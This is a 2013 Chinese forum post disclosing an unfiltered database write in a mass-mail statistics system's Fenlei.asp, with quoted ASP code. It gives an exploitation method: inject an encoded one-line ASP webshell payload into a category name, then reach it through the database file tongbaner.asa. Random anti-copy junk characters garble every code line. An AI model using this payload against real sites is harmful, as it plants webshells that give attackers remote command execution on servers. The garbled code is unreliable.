找回密码
 立即注册
查看: 2543|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp $ w8 e/ i/ e& C" ?

& W/ `3 E5 j& gIF Request.QueryString("Action")="del" Then
# o2 {8 f+ S" f- c$ dID=Request.QueryString("ID")
* w$ Y& o5 S7 ]8 B! S% C% v6 YIF Countss ("tui","Fenlei",ID )<>0 then 4 f) j5 g% I4 R4 f- U9 Q! T
'略 + ^9 V8 b/ L+ B+ Z9 L" g, y1 A! r
IF Request.QueryString("Action")="Add" Then
/ |4 P( o3 L; ]& ZTname=Request.Form("Typename") ; V7 Z8 f9 G# T+ t# J4 E8 B
Set Rs=Server.CreateObject("adodb.Recordset") # X9 x- T2 y* p- v4 h
Sql="Select * From Fenlei Order by id Desc "
0 D& T, l, |; \5 p. V' U  ~Rs.Open Sql,Conn,1,3 4 f9 u, U, x% ^8 @
Rs.Addnew / U; s2 Z+ w) S  R. O' m* {' ~
Rs("Typename")=Tname 8 u- {, b" w- I9 u8 @
'略
* q9 R7 ~3 F6 m9 b7 zSet Rs=Server.CreateObject("adodb.Recordset") $ t9 }) w  |; P. i' g& i; u
Sql="Select * From Fenlei Order by id Desc " ( O' P  J" u5 z2 L  d
Rs.Open Sql,Conn,1,1
# v* J) ]/ l4 V9 B'略 ; b; ^8 t& r3 B( H1 ~, F5 G$ V
%>
; e- X  e& @4 R: d
8 }9 z; P3 k7 l, e0 e
8 d7 k( I, ]; T6 s  S6 C: O3 G) { * Q* e4 j( m; W" N8 O8 F
没有过滤,直接写入数据库。
4 g  F+ r( Z: F, S4 \2 a- ~- s: S
# i2 X8 u# w4 ~2 U, A  X# J  U利用方法:1 o- `1 S. q' e
+ v9 [- u8 T! }& x3 z( I" d9 T& ?
插入:┼攠數畣整爠煥敵瑳∨≡┩>
$ _8 G( w+ p) f* W8 S& D & U3 p$ @! Y; e# m; F. X  {8 J7 {" M

" ]8 v- S6 c" s# ?连接: http://www.xxx.com/###tongbaner.asa 2 U6 a5 O# L6 R. X  R& O  F2 m9 e) y
'默认安装文件:
, m6 H/ w+ Y" W" o& M/ h: P'install.asp
6 t/ F9 I  r5 X. N7 \5 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表